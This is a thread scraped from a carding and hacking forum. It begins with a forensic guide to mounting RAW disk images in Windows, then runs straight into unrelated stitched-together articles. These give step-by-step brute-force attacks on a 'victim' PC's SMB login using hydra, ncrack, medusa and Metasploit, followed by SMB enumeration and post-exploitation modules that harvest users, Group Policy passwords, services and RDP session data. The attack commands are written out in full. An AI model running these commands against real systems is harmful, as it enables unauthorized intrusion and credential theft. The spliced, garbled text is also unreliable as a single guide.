+- Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc (https://bhcforums.cc)
+-- Forum: Community (https://bhcforums.cc/Forum-Community)
+--- Forum: General Discussion (https://bhcforums.cc/Forum-General-Discussion)
+--- Thread: [Guide] 3 Ways to Mount a RAW Image in Windows (/Thread-Guide-3-Ways-to-Mount-a-RAW-Image-in-Windows)
[Guide] 3 Ways to Mount a RAW Image in Windows - NINZA - 04-24-2020
In Cyber Forensic, to investigate a hard drive or disks we always make a forensic image. In this article, we will learn to create various ways forensic images.
Table of Content :
- Introduction
- Why mounting an image is necessary
- AccessData FTK Imager
- OSFMount
- Mount Image PRO
A Forensic Image is a forensically sound and complete copy of a hard drive or other digital media, generally intended for use as evidence. Copies include unallocated space, slack space, and boot record. Many computer forensic programs, especially the all-in-one suites, use their own file formats to store information. These images are stored in a format of the RAW file or AFF or E01.
RAW Image Format: Forensic image format is a RAW bit-by-bit copy of the original. It is often accompanied by Metadata stored in separate formats. This Image Format is the most commonly used and is read by every Forensic tool in the industry.
Why mounting an image is necessaryOnce the RAW image is created, it can’t be read unless it is mounted by a tool. Mount is the process that will take the raw logical image and mount it onto a specified directory of choice to be able to examine the contents of that image. The image has to include be a recognizable file system as a partition. This makes the invocation of the command interesting as the raw image is a physical disk image and not a specific partition of a file system.
Mount an image for a read-only view that leverages to see the content of the image exactly as the user saw it on the original drive.
There are various methods to mount a RAW file. But before we learn how to mount our RAW files, just have look on your my computer so that you can have an idea about how many drives you have before mounting a RAW file. For instance, the following is the image of my computer of my PC:
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-CcidtOfCSao/V7M07hECrQI/AAAAAAAANIQ/2-fgVh1LqE4c4ViITXe0lec4VlJuLkuEQCLcB/s1600/1.png?w=687&ssl=1)
Now, Let us have a look at these methods :
AccessData FTK Imager
FTK Imager (version – 3.4.2) is a tool introduced by Access Data which is used to preview data. It is also an imaging tool that lets us acquire in a forensically sound way. FTK helps us to create forensic images, Mount an image for a read-only view, Create hashes of files, etc and right now we will focus on its Mount function. To mount a RAW image file via FTK, first of all, download FTK from –>
[To see content please register here]
Now that FTK is downloaded and installed, open it and click on Files on the menu bar. A drop-down menu will appear, from this menu click on Image Mounting.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-QRNIWQB07QA/V7M08xbHx-I/AAAAAAAANIs/4Vj5USPeIfgIMWf9LPI_mgcHOj8uMfjBACLcB/s1600/3.png?w=687&ssl=1)
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-65jXAGU8tAo/V7M087VDMEI/AAAAAAAANIo/FIA-zq4DbXUdA79vEG6Xxc_6brtK0YbkgCLcB/s1600/2.png?w=687&ssl=1)
Once you click on Mount button your image will be mounted and you can see the result in Mapped images:
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-_LRnNH951rw/V7M09aC0XTI/AAAAAAAANIw/FlnyZZIUc6ALdlzOHRA6CLySR3h8LJwlgCLcB/s1600/4.png?w=687&ssl=1)
OSFMount
OSFMount (version – 1.5.1015) is software by PassMark Software. It helps you mount your image files even your hard disk image file in windows with a drive letter. You can then analyze the disk image files further. For your original files not to be altered, the image files are mounted as read-only by default. Download this software from –>
[To see content please register here]
Open OSFMount after the installation is completed open it:
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-2l7IZV4YpQw/V7M09a7h-GI/AAAAAAAANI0/k7a65eWdclIFw0mHIZvwxVPzlnlPY_c-wCLcB/s1600/5.png?w=687&ssl=1)
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-e7Ai0AI4IVE/V7M09ik-_PI/AAAAAAAANI4/fudQXgLWmRwRl4dzmpdSxbJ4H-4Vb3LowCLcB/s1600/6.png?w=687&ssl=1)
Dialogues will open; here give the path of your image file under the heading Image file and click on OK.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-piBHZcyCaBY/V7M09_HGKOI/AAAAAAAANI8/lRRC_mzgUi4i9vbTbInZPEfEvxT_koAaQCLcB/s1600/7.png?w=687&ssl=1)
You can see in the following image that your RAW image will be mounted as a result:
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/--QMejVsVO3Y/V7M09_HfNsI/AAAAAAAANJA/wVLr5VWlxvA2xAMwMtWUTX46_E4_JRzkACLcB/s1600/8.png?w=687&ssl=1)
Mount Image Pro
Get Data is a software development company that has launched Mount Image Pro (version – 6). It is a computer forensic tool which enables us to mount an image for a forensic purpose. You can download this software from
[To see content please register here]
Open the software after its installation.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-0IldbOfFMbU/V7M0-Noi6NI/AAAAAAAANJE/shzG-Gs6XT4yQCprWpOAI7YL4qYa9h58ACLcB/s1600/9.png?w=687&ssl=1)
![[Image: 10.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-iUahPG4BJlw/V7M07gjYgoI/AAAAAAAANIM/XxzOaGfSVcA7hukaJywhVluwykWVsNrMACLcB/s1600/10.png?w=687&ssl=1)
A dialogue box will open and select your image file from it.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-XIqAPeW4HuY/V7M07qLousI/AAAAAAAANIU/r9tUGEQTFBwwHDvt9r0h1Q3-Isp82p_wQCLcB/s1600/11.png?w=687&ssl=1)
And then another dialogue box will open informing you with all the details. Click on OK.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-Xs_yNahPXps/V7M08BH3aZI/AAAAAAAANIY/pAB9P1P_P6M5cEKkncbHxhG_gBtuw7jXgCLcB/s1600/12.png?w=687&ssl=1)
It will further show you the progress in another dialogue box.
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-MZHHfqt-fc4/V7M08NMOnWI/AAAAAAAANIc/Z4vYu4FdPUUXk82189wHUMe5955difzPgCLcB/s1600/13.png?w=687&ssl=1)
And as the outcome you can see that your image file will mount as shown in the following image:
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-dsj_hWiERVQ/V7M08XMVB_I/AAAAAAAANIg/OUNf74vho18mcNDiiTdxmlR6jNwyJeszQCLcB/s1600/14.png?w=687&ssl=1)
Now, as I had asked you to check you’re my computer before mounting the image, similarly, you can again check my computer and you will an extra drive as shown below:
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-bMGiI8Y-PXk/V7M08jn5V-I/AAAAAAAANIk/boAdLlk6FQMlQVIh5KBFllc7-yH9tEjKACLcB/s1600/15.png?w=687&ssl=1)
In this article, we will learn how to gain control over our victim’s PC through SMB Port. There are various ways to do it and let take time and learn all those because different circumstances call for a different measure.
Table of Contents
- Hydra
- X-Hydra
- Medusa
- Ncrack
- Metasploit
This is the graphical version to apply dictionary attack via SMB port to hack a system. For this method to work:
Open xHydra in your Kali. And select Single Target option and there give the IP of your victim PC. And select smb in the box against Protocol option and give the port number 445 against the port option.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-1l4jtN0-RVs/Wp7QKE_WPPI/AAAAAAAAVB8/ID1QQcSz4IUkOIVPvQqWMKMBnjk6A7uVwCEwYBhgL/s1600/3.png?w=687&ssl=1)
Now, go to Passwords tab and select Username List and give the path of your text file, which contains usernames, in the box adjacent to it.
Then select Password List and give the path of your text file, which contains all the passwords, in the box adjacent to it.
![[Image: 4.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-2sgJmXylX8s/Wp7QKJSobsI/AAAAAAAAVB0/SkGH4zpDOFENghVi-NFusMXyfcIqgQeQQCEwYBhgL/s1600/4.png?w=687&ssl=1)
After doing this, go to the Start tab and click on the Start button on the left.
Now, the process of dictionary attack will start. Thus, you will attain the username as pc21 and password as 123 of your victim.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-BcAFeRcptSA/Wp7QLOnr-sI/AAAAAAAAVCA/UzfICqTk6GkAeGmJUI3QV6blvMlHmtQpQCEwYBhgL/s1600/5.png?w=687&ssl=1)
Hydra
This is one command method and works efficiently with not much work. This method works in the terminal of kali. Therefore, open the terminal in your kali and type:
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb
1
hydra -L /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 smb
Here,
-L –> denotes the path of username list
-P –> is to denote the path of password
Once the commands are executed it will start applying the dictionary attack and so you will have the right username and password in no time. After a few minutes, Hydra crack the credential, as you can observe that we had successfully grabbed the SMB username as pc21 and password as 123.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-05Cp0_Q_XHM/Wp7QKLSTC3I/AAAAAAAAVB4/T7tiGE7228k-meXAdzrGUcja_TL5VkR5gCEwYBhgL/s1600/2.png?w=687&ssl=1)
Ncrack
This too is a one command method which also works in the terminal of kali. Go to your terminal and type:
ncrack –U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445
1
ncrack –U /root/Desktop/user.txt -P /root/Desktop/pass.txt 192.168.1.118 –p 445
Here,
-U –> denotes the path of username list
-P –> denotes password file’s path
445 –> is the port number
And so, with little work, we can attain the password and username of our victim’s PC. Hence, all the methods to hack a system through SMB port which is used for file sharing
![[Image: 6.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-x6q7jTA4PY8/Wp7QLmwpxVI/AAAAAAAAVCE/2iyMoRv3iUU4EdeaTSVHueZ4kI_8KTCAwCEwYBhgL/s1600/6.png?w=687&ssl=1)
Medusa
Medusa is a speedy, parallel, and modular, login brute-forcer. The goal is to support as many services which allow remote authentication as possible
Run the following command
medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt
1
medusa -h 192.168.1.118 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M smbnt
Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-d1lkaZv0KvE/Wp7QLzOaepI/AAAAAAAAVCc/GxeS4fYnKpMTV18Q5pz-buUQd8h47wh6gCEwYBhgL/s1600/7.png?w=687&ssl=1)
Metasploit
This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Once the metasploit opens type:
use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhosts 192.168.1.118
msf exploit (smb_login)>set user_file /root/Desktop/user.txt
msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit
1
2
3
4
5
6
use auxiliary/scanner/smb/smb_login
msf exploit (smb_login)>set rhosts 192.168.1.118
msf exploit (smb_login)>set user_file /root/Desktop/user.txt
msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt
msf exploit (smb_login)>set stop_on_success true
msf exploit (smb_login)>exploit
Here,
auxiliary/scanner/smb/smb_login—> is a module we will use to attempt to login
/root/Desktop/user.txt –> is the path of a text file which is the resident of all the possible usernames.
/root/Desktop/pass.txt –> is the path of a text file in which all the possible passwords resides.
Now, the process of dictionary attack will start. Thus, you will attain the username and password of your victim.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-SDXAu3AhoNQ/Wp7QL_nL3lI/AAAAAAAAVCg/lSlEoL1rB3E9Wp6-C-Ln7nVUQ_Cml0wjACEwYBhgL/s1600/8.png?w=687&ssl=1)
In Hacking, Ports and Protocols play a major role as hacking is not possible without them. And to work with them, let us first understand ports and protocols.
In information technology, a protocol is the special set of rules that end points in a telecommunication connection use when they communicate. Protocols specify interactions between the communicating entities. So, basically, Network protocols are the language of rules and conventions used for handling communicated between network devices and ensuring the optimal operation of a network. Network protocols include key internet protocols such as IP and IPv6 as well as DNS and FTP, and it also includes more network-specific protocols like SNMP and NTP.
In the internet protocol suite, a port is an endpoint of communication in an operating system. A port in computer networking is a logical access channel for communication between two devices. Bi-directional communications and more complex connections may use multiple ports (channels) simultaneously. It is always associated with an IP address of a host and the protocol type of the communication, and thus completes the destination or origination address of a communication session.
A port is identified for each address and protocol by a 16-bit number, commonly known as the port number.
This understood Ports and Protocols. Now, to work with the SMB protocol, let us understand it.
SMB: Server Message Block, the modern dialect of which was known as Common Internet File System, operates as an application-layer network protocol for file sharing that allows applications on a computer to read and write to files and to request services from server programs in a computer network. The SMB protocol can be used on top of its TCP/IP protocol or other network protocols. Using the SMB protocol, an application (or the user of an application) can access files or other resources at a remote server. This allows applications to read, create, and update files on the remote server. It can also communicate with any server program that is set up to receive an SMB client request.
Presently, the latest version of SMB is the SMB 3.1.1 which was introduced with Windows 10 and Windows Server 2016. This version supports AES 128 GCM encryption in addition to AES 128 CCM encryption added in SMB3 and implements pre-authentication integrity check using SHA-512 hash. SMB 3.1.1 also makes secure negotiation mandatory when connecting to clients using SMB 2.x and higher.
Working of SMB: SMB functions as a request-response or client-server protocol. The only time that the protocol does not work in a response-request framework is when a client requests an opportunistic lock (oplock) and the server has to break an existing oplock because the current mode is incompatible with the existing oplock. Client computers using SMB connect to a supporting server using NetBIOS over TCP/IP, IPX/SPX, or NetBEUI. Once the connection is established, the client computer or program can then open, read/write, and access files similar to the file system on a local computer.
SMB Protocol Security: The SMB protocol supports two levels of security. The first is the share level. The server is protected at this level and each share has a password. The client computer or user has to enter the password to access data or files saved under the specific share. This is the only security model available in the Core and Core plus SMG protocol definitions. User level protection was later added to the SMB protocol. It is applied to individual files and each share is based on specific user access rights. Once a server authenticates the client, he/she is given a unique identification (UID) that is presented upon access to the server. The SMB protocol has supported individual security since LAN Manager 1.0 was implemented.
In Metasploit, there are very simple commands to know if the remote host or remote PC support SMB or not.
SMB 2.0 Protocol Detection
Detect systems that support the SMB 2.0 protocol
use auxiliary/scanner/smb/smb2
msf exploit (smb2)>set rhosts 192.168.0.104
msf exploit (smb2)>set rport 445
msf exploit (smb2)>exploit
![[Image: 1.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-FIFNVTOZK-I/V7DNv-x_ylI/AAAAAAAANGs/Hoy1hvXwfgE21Be84ec7RCVGb5wNr6hhACLcB/s1600/1.png?w=687)
Once you hit enter after exploit, you will see the result providing you with all the information about the opened SMB Protocol.
SMB Version Detection
Display version information about each system
use auxiliary/scanner/smb/smb_version
msf exploit (smb_version)>set rhosts 192.168.0.104
msf exploit (smb_version)>exploit
![[Image: 2.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-u6BqmKqzFiY/V7DNvtbPdhI/AAAAAAAANGo/CeCxofRwkN80R-sdTEjjOJtnFzvgu5tOgCLcB/s1600/2.png?w=687)
After the command has been run, it will inform you about the version of SMB running on our remote PC.
SMB Share Enumeration
This module determines what shares are provided by the SMB service and which ones are readable/writable. It also collects additional information such as share types, directories, files, timestamps, etc. By default, a netshareenum request is done in order to retrieve share information, but if this fails, you may also fall back to SRVSVC.
use auxiliary/scanner/smb/smb_enumshares
msf exploit (smb_enumshares)>set rhosts 192.168.0.104
msf exploit (smb_enumshares)>set smbuser raj
msf exploit (smb_enumshares)>set smbpass raj
msf exploit (smb_enumshares)>exploit
![[Image: 3.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-U8uI5gAUW_A/V7DNwcLVUqI/AAAAAAAANGw/yrWy0HUfOyozl6XN_LI0rxLXq0LxnL89wCLcB/s1600/3.png?w=687)
And so, after the execution of the command, the result will be displayed. Some of the access is denied most of the systems that are probed. Passing user credentials to the scanner will produce many different results.
SMB User Enumeration (SAM EnumUsers)
Determine what local users exist via the SAM RPC service
use auxiliary/scanner/smb/smb_enumusers
msf exploit (smb_enumusers)>set rhosts 192.168.0.104
msf exploit (smb_enumusers)>set smbuser raj
msf exploit (smb_enumusers)>set smbpass raj
msf exploit (smb_enumusers)>exploit
![[Image: 4.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-F80rWVBo93s/V7DNxRmauDI/AAAAAAAANG0/QIQKfO7uO5I1AcaANHCL4S5jm6caLNJ_ACLcB/s1600/4.png?w=687)
As the command executes we can see that it has provided us with the list of users of our remote PC.
SMB SID User Enumeration (LookupSid)
Determine what users exist via brute force SID lookups. This module can enumerate both local and domain accounts by setting ACTION to either LOCAL and DOMAIN
use auxiliary/scanner/smb/smb_lookupsid
msf exploit (smb_lookupsid)>set rhosts 192.168.0.104
msf exploit (smb_lookupsid)>set smbuser raj
msf exploit (smb_lookupsid)>set smbpass raj
msf exploit (smb_lookupsid)>exploit
![[Image: 5.png?w=687]](https://i2.wp.com/1.bp.blogspot.com/-foAeqBDHc6A/V7DNyiaB0MI/AAAAAAAANG4/n_pnKm7KTJ4laLod1K_YrjRl5QIbVTZuwCLcB/s1600/5.png?w=687)
And so, you can find all the users which you never even knew that existed.
Now that you scan your remote PC’s IP with nmap you will see that these ports were opened through which you gathered all the desired information.
nmap -sV 192.168.0.104
![[Image: 6.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-KdQ2A6vlrkQ/V7DNy68YFMI/AAAAAAAANG8/kl-s7vOZetE6GV3E41Rdyur6eGwoB9rrACLcB/s1600/6.png?w=687)
And in the result, as above, you can see that Ports 445, 139 were infecting open.
Conclusion: Understanding a port and finding such things through a given port helps us to exploit our victim much more accurately as gather the most minute piece of information. Collecting such information about a port and knowing what to do with it give the exploiter certain power of manipulation. Therefore, understanding a port and what it can do and how to find information about it on our remote PC helps us improve our hacking skills as this is the foundation of hacking.
Enumerate all logged on users
This module will enumerate current and recently logged on Windows users.
msf > use post/windows/gather/enum_logged_on_users
msf post(enum_logged_on_users) > set session 1
msf post(enum_logged_on_users) > exploit
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-Ny0Ay3LLvBA/V6r5zXUTUNI/AAAAAAAANGE/luBWRag9DCcVePH3RLbaNqOjJAa6HN7AwCLcB/s1600/1.png?w=687&ssl=1)
Gather All Group Policy Preference
This module enumerates the victim machine’s domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsoft’s public AES key. Cached Group Policy files may if the group policy object is deleted rather than unlinked. Tested on WinXP SP3 Client and Win2k8 R2 DC.
msf > use post/windows/gather/credentials/gpp
msf post(gpp) > set session 1
msf post(gpp) > exploit
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-kxZZmEI6W5g/V6r5lTfbFOI/AAAAAAAANF8/7r5nkWfYXhMC21mfNsShdo9Cy3nz4Mg4QCLcB/s1600/2.png?w=687&ssl=1)
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-MI0F5oTBa_E/V6r5bTYP3cI/AAAAAAAANF4/B_2HDadIiAwMxvnbnWaNqeEHJTbkjoa2QCLcB/s1600/3.png?w=687&ssl=1)
Find All DNS Service Records
Enumerates know SRV Records for a given domain using target host DNS query tool.
msf > use post/multi/gather/dns_srv_lookup
msf post(dns_srv_lookup) > set domain rajlab.com
msf post(dns_srv_lookup) > set session 1
msf post(dns_srv_lookup) > exploit
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-QWMMgEYW1V8/V6r5pBtYmSI/AAAAAAAANGA/wPbVXLJ9S-caUQaEiOjbyYsisZ7KorhcQCLcB/s1600/4.png?w=687&ssl=1)
Find All Services in Server
This module will query the system for services and display name and configuration info for each returned service. It allows you to optionally search the credentials, path, or start type for a string and only return the results that match. These query operations are cumulative and if no query strings are specified, it just returns all services. NOTE: If the script hangs, windows firewall is most likely on and you did not migrate to a safe process (explorer.exe for example)
msf > use post/windows/gather/enum_services
msf post(enum_services) > set session 1
msf post(enum_services) > exploit
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/--IYbegr9Dms/V6r6FFp7sUI/AAAAAAAANGM/RMb2rve9FukLsR75SaLwij44u_V-KFW9wCLcB/s1600/5.png?w=687&ssl=1)
Find All Active Directory TCP sessions
This Module lists current TCP sessions.
msf > use post/windows/gather/tcpnetstat
msf post(tcpnetstat) > set session 1
msf post(tcpnetstat) > exploit
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-MmDRr2E9VNM/V6r53gkdXrI/AAAAAAAANGI/jxZPSKldu8QIFHY4tuz8lw67c8eefR45gCLcB/s1600/6.png?w=687&ssl=1)
This module will enumerate all installed applications
msf > use post/windows/gather/enum_applications
msf post(enum_applications) > set session 1
msf post(enum_applications) > exploit
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-rqDvP8MkiGc/V6r6GVa-WpI/AAAAAAAANGQ/uyRV7cla1QI9La5fyBMyaxSVr2vywZwgACLcB/s1600/7.png?w=687&ssl=1)
Find All Remote Desktop Session
This module dumps MRU and connection data for RDP sessions.
msf > use post/windows/gather/enum_termserv
msf post(enum_termserv) > set session 1
msf post(enum_termserv) > exploit
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-3Rtc2ytB1jo/V6r6IrhFlII/AAAAAAAANGY/-DCKZfOS4yoIagCkh2Npb4l_dx_oqPPXgCLcB/s1600/8.png?w=687&ssl=1)